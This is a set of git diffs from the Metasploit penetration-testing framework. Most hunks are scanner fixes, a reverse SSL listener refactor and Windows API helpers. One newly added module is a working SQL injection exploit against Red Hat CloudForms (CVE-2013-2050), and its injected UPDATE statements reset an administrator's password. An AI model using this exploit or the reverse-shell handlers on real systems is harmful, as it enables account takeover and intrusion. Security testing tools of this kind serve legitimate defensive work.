# First attempt to bind LHOST. If that fails, the user probably has
# something else listening on that interface. Try again with ANY_ADDR.
any = (addr.length == 4) ? "0.0.0.0" : "::0"
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
comm = datastore['ReverseListenerComm'] comm = datastore['ReverseListenerComm']
if comm.to_s == "local" if comm.to_s == "local"
@ -74,20 +69,16 @@ module ReverseTcpSsl
comm = nil comm = nil
end end
if not datastore['ReverseListenerBindAddress'].to_s.empty? local_port = bind_port
# Only try to bind to this specific interface addrs = bind_address
addrs = [ datastore['ReverseListenerBindAddress'] ]
# Pick the right "any" address if either wildcard is used
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
end
addrs.each { |ip| addrs.each { |ip|
begin begin
comm.extend(Rex::Socket::SslTcp) comm.extend(Rex::Socket::SslTcp)
self.listener_sock = Rex::Socket::SslTcpServer.create( self.listener_sock = Rex::Socket::SslTcpServer.create(
'LocalHost' => datastore['LHOST'], 'LocalHost' => ip,
'LocalPort' => datastore['LPORT'].to_i, 'LocalPort' => local_port,
'Comm' => comm, 'Comm' => comm,
'SSLCert' => datastore['SSLCert'], 'SSLCert' => datastore['SSLCert'],
'Context' => 'Context' =>
@ -108,16 +99,43 @@ module ReverseTcpSsl
via = "" via = ""
end end
print_status("Started reverse SSL handler on #{ip}:#{datastore['LPORT']} #{via}") print_status("Started reverse SSL handler on #{ip}:#{local_port} #{via}")
break break
rescue rescue
ex = $! ex = $!
print_error("Handler failed to bind to #{ip}:#{datastore['LPORT']}") print_error("Handler failed to bind to #{ip}:#{local_port}")
end end
} }
raise ex if (ex) raise ex if (ex)
end end
protected
def bind_port
port = datastore['ReverseListenerBindPort'].to_i
port > 0 ? port : datastore['LPORT'].to_i
end
def bind_address
# Switch to IPv6 ANY address if the LHOST is also IPv6
addr = Rex::Socket.resolv_nbo(datastore['LHOST'])
# First attempt to bind LHOST. If that fails, the user probably has
# something else listening on that interface. Try again with ANY_ADDR.
any = (addr.length == 4) ? "0.0.0.0" : "::0"
addrs = [ Rex::Socket.addr_ntoa(addr), any ]
if not datastore['ReverseListenerBindAddress'].to_s.empty?
# Only try to bind to this specific interface
addrs = [ datastore['ReverseListenerBindAddress'] ]
# Pick the right "any" address if either wildcard is used
addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0")
end
addrs
end
end end
end end

View File

@ -449,6 +449,9 @@ class Module
ch = self.compat['Nop'] ch = self.compat['Nop']
elsif (mod.type == MODULE_PAYLOAD) elsif (mod.type == MODULE_PAYLOAD)
ch = self.compat['Payload'] ch = self.compat['Payload']
if self.respond_to?("target") and self.target['Payload'] and self.target['Payload']['Compat']
ch = ch.merge(self.target['Payload']['Compat'])
end
else else
return true return true
end end

View File

@ -1,5 +1,6 @@
module Msf::Post::Windows module Msf::Post::Windows
require 'msf/core/post/windows/error'
require 'msf/core/post/windows/accounts' require 'msf/core/post/windows/accounts'
require 'msf/core/post/windows/cli_parse' require 'msf/core/post/windows/cli_parse'
require 'msf/core/post/windows/eventlog' require 'msf/core/post/windows/eventlog'

File diff suppressed because it is too large Load Diff

View File

@ -306,6 +306,50 @@ module Services
handle["GetLastError"] handle["GetLastError"]
end end
end end
#
# Query Service Status
#
# @param (see #service_start)
#
# @return {} representing lpServiceStatus
#
# @raise (see #service_start)
#
#
def service_status(name, server=nil)
adv = session.railgun.advapi32
ret = nil
# 0x80000000 GENERIC_READ
open_sc_manager(:host => server, :access => 0x80000000) do |manager|
# Now to grab a handle to the service.
handle = adv.OpenServiceA(manager, name, 0x80000000)
if (handle["return"] == 0)
raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}")
end
status = adv.QueryServiceStatus(handle["return"],28)
if (status["return"] == 0)
raise RuntimeError.new("Could not query service. QueryServiceStatus error: #{handle["GetLastError"]}")
end
vals = status['lpServiceStatus'].unpack('L*')
adv.CloseServiceHandle(handle["return"])
ret = {
:type => vals[0],
:state => vals[1],
:controls_accepted => vals[2],
:win32_exit_code => vals[3],
:service_exit_code => vals[4],
:check_point => vals[5],
:wait_hint => vals[6]
}
end
return ret
end
end end
end end

View File

@ -1040,6 +1040,7 @@ def self.to_vba(framework,code,opts={})
hash_sub[:var_proc] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_proc] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_fperm] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_fperm] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_fdel] = Rex::Text.rand_text_alpha(rand(8)+8) hash_sub[:var_fdel] = Rex::Text.rand_text_alpha(rand(8)+8)
hash_sub[:var_exepatharray] = Rex::Text.rand_text_alpha(rand(8)+8)
# Specify the payload in hex as an extra file.. # Specify the payload in hex as an extra file..
payload_hex = exe.unpack('H*')[0] payload_hex = exe.unpack('H*')[0]

View File

@ -1,4 +1,5 @@
# -*- coding: binary -*- # -*- coding: binary -*-
require 'metasm'
module Rex module Rex
module ElfScan module ElfScan
@ -27,6 +28,26 @@ class Generic
rva = hit[0] rva = hit[0]
message = hit[1].is_a?(Array) ? hit[1].join(" ") : hit[1] message = hit[1].is_a?(Array) ? hit[1].join(" ") : hit[1]
$stdout.puts elf.ptr_s(rva) + " " + message $stdout.puts elf.ptr_s(rva) + " " + message
if(param['disasm'])
message.gsub!("; ", "\n")
if message.include?("retn")
message.gsub!("retn", "ret")
end
begin
d2 = Metasm::Shellcode.assemble(Metasm::Ia32.new, message).disassemble
rescue Metasm::ParseError
d2 = Metasm::Shellcode.disassemble(Metasm::Ia32.new, [message].pack('H*'))
end
addr = 0
while ((di = d2.disassemble_instruction(addr)))
disasm = "0x%08x\t" % (rva + addr)
disasm << di.instruction.to_s
$stdout.puts disasm
addr = di.next_addr
end
end
end end
end end
@ -203,4 +224,3 @@ end
end end
end end
end end

View File

@ -27,6 +27,10 @@ class Def_advapi32
def self.create_dll(dll_path = 'advapi32') def self.create_dll(dll_path = 'advapi32')
dll = DLL.new(dll_path, ApiConstants.manager) dll = DLL.new(dll_path, ApiConstants.manager)
dll.add_function('QueryServiceStatus', 'DWORD', [
['LPVOID', 'hService', 'in'],
['PBLOB', 'lpServiceStatus', 'out']])
dll.add_function('CredEnumerateA', 'BOOL', [ dll.add_function('CredEnumerateA', 'BOOL', [
['PCHAR', 'Filter', 'in'], ['PCHAR', 'Filter', 'in'],
['DWORD', 'Flags', 'in'], ['DWORD', 'Flags', 'in'],
@ -2089,10 +2093,8 @@ class Def_advapi32
["PBLOB","pvContext","in"], ["PBLOB","pvContext","in"],
]) ])
return dll return dll
end end
end end
end; end; end; end; end; end; end end; end; end; end; end; end; end

View File

@ -130,7 +130,7 @@ class Metasploit3 < Msf::Auxiliary
</SOAP-ENV:Body> </SOAP-ENV:Body>
</SOAP-ENV:Envelope>| </SOAP-ENV:Envelope>|
template = template.gsub(/^\t\t/, '') template = template.gsub(/^ {4}/, '')
template = template.gsub(/\n/, '') template = template.gsub(/\n/, '')
connect connect

View File

@ -0,0 +1,175 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'bcrypt'
require 'digest'
require 'openssl'
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => 'Red Hat CloudForms Management Engine 5.1 miq_policy/explorer SQL Injection',
'Description' => %q{
This module exploits a SQL injection vulnerability in the "explorer"
action of "miq_policy" controller of the Red Hat CloudForms Management
Engine 5.1 (ManageIQ Enterprise Virtualization Manager 5.0 and earlier) by
changing the password of the target account to the specified password.
},
'Author' => 'Ramon de C Valle',
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-2050'],
['CWE', '89'],
['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=959062']
],
'DefaultOptions' =>
{
'SSL' => true
},
'DisclosureDate' => 'Nov 12 2013'
)
register_options(
[
Opt::RPORT(443),
OptString.new('USERNAME', [true, 'Your username']),
OptString.new('PASSWORD', [true, 'Your password']),
OptString.new('TARGETUSERNAME', [true, 'The username of the target account', 'admin']),
OptString.new('TARGETPASSWORD', [true, 'The password of the target account', 'smartvm']),
OptString.new('TARGETURI', [ true, 'The path to the application', '/']),
OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'POST', ['GET', 'POST'] ])
], self.class
)
end
def password_for_newer_schema
# Newer versions use ActiveModel's SecurePassword.
BCrypt::Password.create(datastore['TARGETPASSWORD'])
end
def password_for_older_schema
# Older versions use ManageIQ's MiqPassword.
if datastore['TARGETPASSWORD'].empty?
'v1:{}'
else
password = '1234567890123456'
salt = '6543210987654321'
cipher = OpenSSL::Cipher.new('AES-256-CBC')
cipher.encrypt
cipher.key = Digest::SHA256.digest("#{salt}#{password}")[0...32]
encrypted = cipher.update(datastore['TARGETPASSWORD']) + cipher.final
"v1:{#{Rex::Text.encode_base64(encrypted)}}"
end
end
def password_reset?
print_status("Trying to log into #{target_url('dashboard')} using the target account...")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'dashboard', 'authenticate'),
'vars_post' => {
'user_name' => datastore['TARGETUSERNAME'],
'user_password' => datastore['TARGETPASSWORD']
}
)
if res.nil?
print_error('No response from remote host')
return false
end
if res.body =~ /"Error: (.*)"/
print_error($1)
false
else
true
end
end
def run
print_status("Logging into #{target_url('dashboard')}...")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'dashboard', 'authenticate'),
'vars_post' => {
'user_name' => datastore['USERNAME'],
'user_password' => datastore['PASSWORD']
}
)
if res.nil?
print_error('No response from remote host')
return
end
if res.body =~ /"Error: (.*)"/
print_error($1)
return
else
session = $1 if res.headers['Set-Cookie'] =~ /_vmdb_session=(\h*)/
if session.nil?
print_error('Failed to retrieve the current session id')
return
end
end
# Newer versions don't accept POST requests.
print_status("Sending password-reset request to #{target_url('miq_policy', 'explorer')}...")
send_request_cgi(
'cookie' => "_vmdb_session=#{session}",
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'miq_policy', 'explorer'),
'vars_get' => {
'profile[]' => value_for_newer_schema
}
)
if password_reset?
print_good('Password reset successfully')
return
else
print_error('Failed to reset password')
end
print_status("Sending (older-schema) password-reset request to #{target_url('miq_policy', 'explorer')}...")
send_request_cgi(
'cookie' => "_vmdb_session=#{session}",
'method' => datastore['HTTP_METHOD'],
'uri' => normalize_uri(target_uri.path, 'miq_policy', 'explorer'),
"vars_#{datastore['HTTP_METHOD'].downcase}" => {
'profile[]' => value_for_older_schema
}
)
if password_reset?
print_good('Password reset successfully')
else
print_error('Failed to reset password')
end
end
def target_url(*args)
(ssl ? 'https' : 'http') +
if rport.to_i == 80 || rport.to_i == 443
"://#{vhost}"
else
"://#{vhost}:#{rport}"
end + normalize_uri(target_uri.path, *args)
end
def value_for_newer_schema
"1 = 1); UPDATE users SET password_digest = '#{password_for_newer_schema}' WHERE userid = '#{datastore['TARGETUSERNAME']}' --"
end
def value_for_older_schema
"1 = 1); UPDATE users SET password = '#{password_for_older_schema}' WHERE userid = '#{datastore['TARGETUSERNAME']}' --"
end
end

View File

@ -77,6 +77,10 @@ class Metasploit3 < Msf::Auxiliary
ports = Rex::Socket.portspec_crack(datastore['PORTS']) ports = Rex::Socket.portspec_crack(datastore['PORTS'])
if ports.empty?
raise Msf::OptionValidateError.new(['PORTS'])
end
ports.each_with_index do |port,i| ports.each_with_index do |port,i|
p.tcp_dst = port p.tcp_dst = port
p.tcp_src = rand(64511)+1024 p.tcp_src = rand(64511)+1024

View File

@ -0,0 +1,116 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'net/dns/resolver'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'DNS Non-Recursive Record Scraper',
'Description' => %q{
This module can be used to scrape records that have been cached
by a specific nameserver. The module allows the user to test
every record from a specified file.
},
'Author' => [
'Brandon McCann "zeknox" <bmccann[at]accuvant.com>',
'Rob Dixon "304geek" <rob.dixon[at]accuvant.com>'
],
'License' => MSF_LICENSE,
'References' => [
['URL', 'http://304geeks.blogspot.com/2013/01/dns-scraping-for-corporate-av-detection.html'],
['URL', 'http://www.rootsecure.net/content/downloads/pdf/dns_cache_snooping.pdf']
]))
register_options([
OptString.new('DOMAIN', [ false, "Domain name to query for"]),
OptPath.new('WORDLIST', [ false, "Wordlist for domain name queries", ::File.join(Msf::Config.data_directory, "wordlists", "av-update-urls.txt")]),
OptAddress.new('NS', [ true, "Specify the nameserver to use for queries" ]),
], self.class)
register_advanced_options([
OptBool.new('TCP_DNS', [false, "Run queries over TCP", false]),
OptInt.new('DNS_TIMEOUT', [true, "DNS Timeout in seconds", 5])
], self.class)
end
# method to scrape dns
def scrape_dns(domain)
# dns request with recursive disabled
use_tcp = datastore['TCP_DNS']
res = Net::DNS::Resolver.new(:nameservers => "#{datastore['NS']}", :recursive => false, :use_tcp => use_tcp)
use_tcp ? res.tcp_timeout = datastore['DNS_TIMEOUT'] : res.udp_timeout = datastore['DNS_TIMEOUT']
# query dns
begin
query = res.send(domain)
rescue ResolverArgumentError
print_error("Invalid domain: #{domain}")
return
rescue NoResponseError
print_error("DNS Timeout Issue: #{domain}")
return
end
# found or not found
if query.answer.empty?
vprint_status("#{domain} - Not Found")
return
end
@is_vulnerable = true
print_good("#{domain} - Found")
report_goods(domain)
end
# method to read each line from file
def read_file
::File.open("#{datastore['WORDLIST']}", "rb").each_line do |line|
scrape_dns(line.chomp)
end
end
# log results to database
def report_goods(domain)
if datastore['TCP_DNS']
proto = "tcp"
else
proto = "udp"
end
report_note(
:host => datastore['NS'],
:name => "dns",
:port => 53,
:proto => proto,
:type => "dns.cache.scrape",
:data => "#{domain} cached",
:update => :unique_data
)
end
# main control method
def run
@is_vulnerable = false
print_status("Making queries against #{datastore['NS']}")
if datastore['DOMAIN'].blank?
read_file
else
scrape_dns(datastore['DOMAIN'])
end
report_vuln(
:host => datastore['NS'],
:name => "DNS Cache Snooping",
) if @is_vulnerable
end
end

View File

@ -0,0 +1,68 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::Udp
def initialize
super(
'Name' => 'Chargen Probe Utility',
'Description' => %q{
Chargen is a debugging and measurement tool and a character
generator service. A character generator service simply sends
data without regard to the input.
Chargen is susceptible to spoofing the source of transmissions
as well as use in a reflection attack vector. The misuse of the
testing features of the Chargen service may allow attackers to
craft malicious network payloads and reflect them by spoofing
the transmission source to effectively direct it to a target.
This can result in traffic loops and service degradation with
large amounts of network traffic.
},
'Author' => 'Matteo Cantoni <goony[at]nothink.org>',
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '1999-0103' ], # Note, does not actually trigger a flood.
[ 'URL', 'https://www.cert.be/pro/docs/chargensnmp-ddos-attacks-rise' ],
[ 'URL', 'http://tools.ietf.org/html/rfc864' ],
],
'DisclosureDate' => 'Feb 08 1996')
register_options([
Opt::RPORT(19)
])
deregister_options('RHOST')
end
def run_host(rhost)
begin
connect_udp
pkt = Rex::Text.rand_text_alpha_lower(1)
udp_sock.write(pkt)
r = udp_sock.recvfrom(65535, 0.1)
if r and r[1]
vprint_status("#{rhost}:#{rport} - Response: #{r[0].to_s}")
res = r[0].to_s.strip
if (res.match(/ABCDEFGHIJKLMNOPQRSTUVWXYZ/i) || res.match(/0123456789/))
print_good("#{rhost}:#{rport} answers with #{res.length} bytes (headers + UDP payload)")
report_service(:host => rhost, :port => rport, :name => "chargen", :info => res.length)
end
end
rescue ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionRefused
nil
ensure
disconnect_udp if self.udp_sock
end
end
end

View File

@ -46,6 +46,7 @@ class Metasploit3 < Msf::Auxiliary
@probes << 'probe_pkt_citrix' @probes << 'probe_pkt_citrix'
@probes << 'probe_pkt_pca_st' @probes << 'probe_pkt_pca_st'
@probes << 'probe_pkt_pca_nq' @probes << 'probe_pkt_pca_nq'
@probes << 'probe_chargen'
end end
@ -204,6 +205,11 @@ class Metasploit3 < Msf::Auxiliary
case pkt[2] case pkt[2]
when 19
app = 'chargen'
return unless chargen_parse(pkt[0])
@results[hkey] = true
when 53 when 53
app = 'DNS' app = 'DNS'
ver = nil ver = nil
@ -362,6 +368,13 @@ class Metasploit3 < Msf::Auxiliary
"#{res[2]}_#{res[1]}" "#{res[2]}_#{res[1]}"
end end
#
# Validate a chargen packet.
#
def chargen_parse(data)
data =~ /ABCDEFGHIJKLMNOPQRSTUVWXYZ|0123456789/i
end
# #
# Validate this is truly Citrix ICA; returns true or false. # Validate this is truly Citrix ICA; returns true or false.
# #
@ -397,6 +410,11 @@ class Metasploit3 < Msf::Auxiliary
# The probe definitions # The probe definitions
# #
def probe_chargen(ip)
pkt = Rex::Text.rand_text_alpha_lower(1)
return [pkt, 19]
end
def probe_pkt_dns(ip) def probe_pkt_dns(ip)
data = [rand(0xffff)].pack('n') + data = [rand(0xffff)].pack('n') +
"\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"+ "\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"+

View File

@ -41,6 +41,7 @@ class Metasploit3 < Msf::Auxiliary
@probes << 'probe_pkt_citrix' @probes << 'probe_pkt_citrix'
@probes << 'probe_pkt_pca_st' @probes << 'probe_pkt_pca_st'
@probes << 'probe_pkt_pca_nq' @probes << 'probe_pkt_pca_nq'
@probes << 'probe_chargen'
end end
def setup def setup
@ -153,6 +154,12 @@ class Metasploit3 < Msf::Auxiliary
case sport case sport
when 19
app = 'chargen'
ver = nil
return unless chargen_parse(data)
@results[hkey] = true
when 53 when 53
app = 'DNS' app = 'DNS'
ver = nil ver = nil
@ -306,6 +313,13 @@ class Metasploit3 < Msf::Auxiliary
print_status("Discovered #{app} on #{shost}:#{sport} (#{inf})") print_status("Discovered #{app} on #{shost}:#{sport} (#{inf})")
end end
#
# Validate a chargen packet.
#
def chargen_parse(data)
data =~ /ABCDEFGHIJKLMNOPQRSTUVWXYZ|0123456789/i
end
# #
# Parse a db2disco packet. # Parse a db2disco packet.
# #
@ -349,6 +363,11 @@ class Metasploit3 < Msf::Auxiliary
# The probe definitions # The probe definitions
# #
def probe_chargen(ip)
pkt = Rex::Text.rand_text_alpha_lower(1)
return [pkt, 19]
end
def probe_pkt_dns(ip) def probe_pkt_dns(ip)
data = [rand(0xffff)].pack('n') + data = [rand(0xffff)].pack('n') +
"\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"+ "\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"+

View File

@ -56,6 +56,10 @@ class Metasploit3 < Msf::Auxiliary
dead = false dead = false
portlist = Rex::Socket.portspec_crack(datastore['PORTS']) portlist = Rex::Socket.portspec_crack(datastore['PORTS'])
if portlist.empty?
raise Msf::OptionValidateError.new(['PORTS'])
end
vprint_status("[#{rhost}] Verifying manual testing is not required...") vprint_status("[#{rhost}] Verifying manual testing is not required...")
manual = false manual = false

View File

@ -162,7 +162,7 @@ class Metasploit3 < Msf::Auxiliary
if (res and res.body) if (res and res.body)
short_name = res.body.scan(/<INPUT NAME=\"ShortName\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join short_name = res.body.scan(/<INPUT NAME=\"ShortName\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
user_mail = res.body.scan(/<INPUT NAME=\"InternetAddress\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join user_mail = res.body.scan(/<INPUT NAME=\"InternetAddress\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
pass_hash = res.body.scan(/<INPUT NAME=\"dspHTTPPassword\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join pass_hash = res.body.scan(/<INPUT NAME=\"\$?dspHTTPPassword\" TYPE=(?:.*) VALUE=\"([^\s]+)"/i).join
if short_name.to_s.strip.empty? if short_name.to_s.strip.empty?
short_name = 'NULL' short_name = 'NULL'

View File

@ -0,0 +1,101 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Poison Ivy Command and Control Scanner',
'Description' => %q{
Enumerate Poison Ivy Command and Control (C&C) on ports 3460, 80, 8080 and 443. Adaptation of iTrust Python script.
},
'References' =>
[
['URL', 'www.malware.lu/Pro/RAP002_APT1_Technical_backstage.1.0.pdf'],
],
'Author' => ['SeawolfRN'],
'License' => MSF_LICENSE
)
register_options(
[
OptString.new('PORTS', [true, "Ports to Check","80,8080,443,3460"]),
OptInt.new('TIMEOUT', [true, "The socket connect timeout in milliseconds", 1000]),
OptInt.new('CONCURRENCY', [true, "The number of concurrent ports to check per host", 10])
], self.class)
deregister_options('RPORT')
end
def run_host(ip)
timeout = datastore['TIMEOUT'].to_i
ports = Rex::Socket.portspec_crack(datastore['PORTS'])
if ports.empty?
raise Msf::OptionValidateError.new(['PORTS'])
end
while(ports.length > 0)
t = []
r = []
begin
1.upto(datastore['CONCURRENCY']) do
this_port = ports.shift
break if not this_port
t << framework.threads.spawn("Module(#{self.refname})-#{ip}:#{this_port}", false, this_port) do |port|
begin
s = connect(false,
{
'RPORT' => port,
'RHOST' => ip,
'ConnectTimeout' => (timeout / 1000.0)
}
)
r << [ip,port,"open",'Unknown']
s.puts("\x00"*0x100,0) #Send 0x100 zeros, wait for answer
data = s.get_once(0x100)
if data.length == 0x100
data = s.get_once(0x4)
if data == "\xD0\x15\x00\x00" #Signature for PIVY C&C
print_status("#{ip}:#{port} - C&C Server Found")
r << [ip,port,"open",'Poison Ivy C&C']
end
end
rescue ::Rex::ConnectionRefused
vprint_status("#{ip}:#{port} - TCP closed")
r << [ip,port,"closed",'']
rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error
rescue ::Rex::Post::Meterpreter::RequestError
raise $!
ensure
disconnect(s) rescue nil
end
end
end
t.each {|x| x.join }
rescue ::Timeout::Error
ensure
t.each {|x| x.kill rescue nil }
end
r.each do |res|
report_service(:host => res[0], :port => res[1], :state => res[2], :name=> res[3])
end
end
end
end

View File

@ -50,8 +50,7 @@ class Metasploit3 < Msf::Auxiliary
ports = Rex::Socket.portspec_crack(datastore['PORTS']) ports = Rex::Socket.portspec_crack(datastore['PORTS'])
if ports.empty? if ports.empty?
print_error("Error: No valid ports specified") raise Msf::OptionValidateError.new(['PORTS'])
return
end end
to = (datastore['TIMEOUT'] || 500).to_f / 1000.0 to = (datastore['TIMEOUT'] || 500).to_f / 1000.0

View File

@ -43,8 +43,7 @@ class Metasploit3 < Msf::Auxiliary
ports = Rex::Socket.portspec_crack(datastore['PORTS']) ports = Rex::Socket.portspec_crack(datastore['PORTS'])
if ports.empty? if ports.empty?
print_error("Error: No valid ports specified") raise Msf::OptionValidateError.new(['PORTS'])
return
end end
datastore['RHOST'] = datastore['BOUNCEHOST'] datastore['RHOST'] = datastore['BOUNCEHOST']

View File

@ -48,8 +48,7 @@ class Metasploit3 < Msf::Auxiliary
ports = Rex::Socket.portspec_crack(datastore['PORTS']) ports = Rex::Socket.portspec_crack(datastore['PORTS'])
if ports.empty? if ports.empty?
print_error("Error: No valid ports specified") raise Msf::OptionValidateError.new(['PORTS'])
return
end end
to = (datastore['TIMEOUT'] || 500).to_f / 1000.0 to = (datastore['TIMEOUT'] || 500).to_f / 1000.0

View File

@ -41,8 +41,7 @@ class Metasploit3 < Msf::Auxiliary
ports = Rex::Socket.portspec_crack(datastore['PORTS']) ports = Rex::Socket.portspec_crack(datastore['PORTS'])
if ports.empty? if ports.empty?
print_error("Error: No valid ports specified") raise Msf::OptionValidateError.new(['PORTS'])
return
end end
while(ports.length > 0) while(ports.length > 0)

View File

@ -50,8 +50,7 @@ class Metasploit3 < Msf::Auxiliary
ports = Rex::Socket.portspec_crack(datastore['PORTS']) ports = Rex::Socket.portspec_crack(datastore['PORTS'])
if ports.empty? if ports.empty?
print_error("Error: No valid ports specified") raise Msf::OptionValidateError.new(['PORTS'])
return
end end
to = (datastore['TIMEOUT'] || 500).to_f / 1000.0 to = (datastore['TIMEOUT'] || 500).to_f / 1000.0

View File

@ -28,8 +28,8 @@ class Metasploit3 < Msf::Auxiliary
], ],
'Author' => 'Author' =>
[ [
'Royce Davis @R3dy_ <rdavis[at]accuvant.com>', 'Royce Davis "R3dy" <rdavis[at]accuvant.com>',
'Brandon McCann @zeknox <bmccann[at]accuvant.com>' 'Brandon McCann "zeknox" <bmccann[at]accuvant.com>'
], ],
'License' => MSF_LICENSE 'License' => MSF_LICENSE
)) ))

View File

@ -9,7 +9,8 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
VALID_HOSTNAME_REGEX = /^(([a-zA-Z0-9]|[a-zA-Z0-9][a-zA-Z0-9\-]*[a-zA-Z0-9])\.)*([A-Za-z0-9]|[A-Za-z0-9][A-Za-z0-9\-]*[A-Za-z0-9])$/
def initialize def initialize
super( super(
@ -36,8 +37,9 @@ class Metasploit3 < Msf::Auxiliary
register_options( register_options(
[ [
OptAddress.new('SAPROUTER_HOST', [true, 'SAPRouter address', '']), OptAddress.new('RHOST', [true, 'SAPRouter address', '']),
OptPort.new('SAPROUTER_PORT', [true, 'SAPRouter TCP port', '3299']), OptPort.new('RPORT', [true, 'SAPRouter TCP port', '3299']),
OptString.new('TARGETS', [true, 'Comma delimited targets. When resolution is local address ranges or CIDR identifiers allowed.', '']),
OptEnum.new('MODE', [true, 'Connection Mode: SAP_PROTO or TCP ', 'SAP_PROTO', ['SAP_PROTO', 'TCP']]), OptEnum.new('MODE', [true, 'Connection Mode: SAP_PROTO or TCP ', 'SAP_PROTO', ['SAP_PROTO', 'TCP']]),
OptString.new('INSTANCES', [false, 'SAP instance numbers to scan (NN in PORTS definition)', '00-99']), OptString.new('INSTANCES', [false, 'SAP instance numbers to scan (NN in PORTS definition)', '00-99']),
OptString.new('PORTS', [true, 'Ports to scan (e.g. 3200-3299,5NN13)', '32NN']), OptString.new('PORTS', [true, 'Ports to scan (e.g. 3200-3299,5NN13)', '32NN']),
@ -47,10 +49,9 @@ class Metasploit3 < Msf::Auxiliary
# 3NN11,3NN17,20003-20007,31596,31597,31602,31601,31604,2000-2002, # 3NN11,3NN17,20003-20007,31596,31597,31602,31601,31604,2000-2002,
# 8355,8357,8351-8353,8366,1090,1095,20201,1099,1089,443NN,444NN # 8355,8357,8351-8353,8366,1090,1095,20201,1099,1089,443NN,444NN
OptInt.new('CONCURRENCY', [true, 'The number of concurrent ports to check per host', 10]), OptInt.new('CONCURRENCY', [true, 'The number of concurrent ports to check per host', 10]),
OptEnum.new('RESOLVE',[true,'Where to resolve TARGETS','local',['remote','local']])
], self.class) ], self.class)
deregister_options('RPORT')
end end
# Converts a instance specification like "4,21-23,33" into a sorted, # Converts a instance specification like "4,21-23,33" into a sorted,
@ -253,6 +254,14 @@ class Metasploit3 < Msf::Auxiliary
vprint_error("#{ip}:#{port} - invalid route") vprint_error("#{ip}:#{port} - invalid route")
when /reacheable/ when /reacheable/
vprint_error("#{ip}:#{port} - unreachable") vprint_error("#{ip}:#{port} - unreachable")
when /hostname '#{ip}' unknown/
vprint_error("#{ip}:#{port} - unknown host")
when /GetHostByName: '#{ip}' not found/
vprint_error("#{ip}:#{port} - unknown host")
when /connection to .* timed out/
vprint_error("#{ip}:#{port} - connection timed out")
when /partner .* not reached/
vprint_error("#{ip}:#{port} - host unreachable")
else else
vprint_error("#{ip}:#{port} - unknown error message") vprint_error("#{ip}:#{port} - unknown error message")
end end
@ -266,11 +275,40 @@ class Metasploit3 < Msf::Auxiliary
return nil return nil
end end
def validate(range)
hosts_list = range.split(",")
return false if hosts_list.nil? or hosts_list.empty?
hosts_list.each do |host|
unless Rex::Socket.is_ipv6?(host) || Rex::Socket.is_ipv4?(host) || host =~ VALID_HOSTNAME_REGEX
return false
end
end
end
def run
if datastore['RESOLVE'] == 'remote'
range = datastore['TARGETS']
unless validate(range)
print_error("TARGETS must be a comma separated list of IP addresses or hostnames when RESOLVE is remote")
return
end
range.split(/,/).each do |host|
run_host(host)
end
else
# resolve IP or crack IP range
ip_list = Rex::Socket::RangeWalker.new(datastore['TARGETS'])
ip_list.each do |ip|
run_host(ip)
end
end
end
def run_host(ip) def run_host(ip)
sap_host = datastore['SAPROUTER_HOST']
sap_port = datastore['SAPROUTER_PORT']
ports = datastore['PORTS'] ports = datastore['PORTS']
# if port definition has NN then we require INSTANCES # if port definition has NN then we require INSTANCES
@ -282,8 +320,7 @@ class Metasploit3 < Msf::Auxiliary
ports = build_sap_ports(ports) ports = build_sap_ports(ports)
if ports.empty? if ports.empty?
print_error('Error: No valid ports specified') raise Msf::OptionValidateError.new(['PORTS'])
return
end end
print_status("Scanning #{ip}") print_status("Scanning #{ip}")
@ -301,15 +338,10 @@ class Metasploit3 < Msf::Auxiliary
begin begin
# create ni_packet to send to saprouter # create ni_packet to send to saprouter
routes = {sap_host => sap_port, ip => port} routes = {rhost => rport, ip => port}
ni_packet = build_ni_packet(routes) ni_packet = build_ni_packet(routes)
s = connect(false, s = connect(false)
{
'RPORT' => sap_port,
'RHOST' => sap_host
}
)
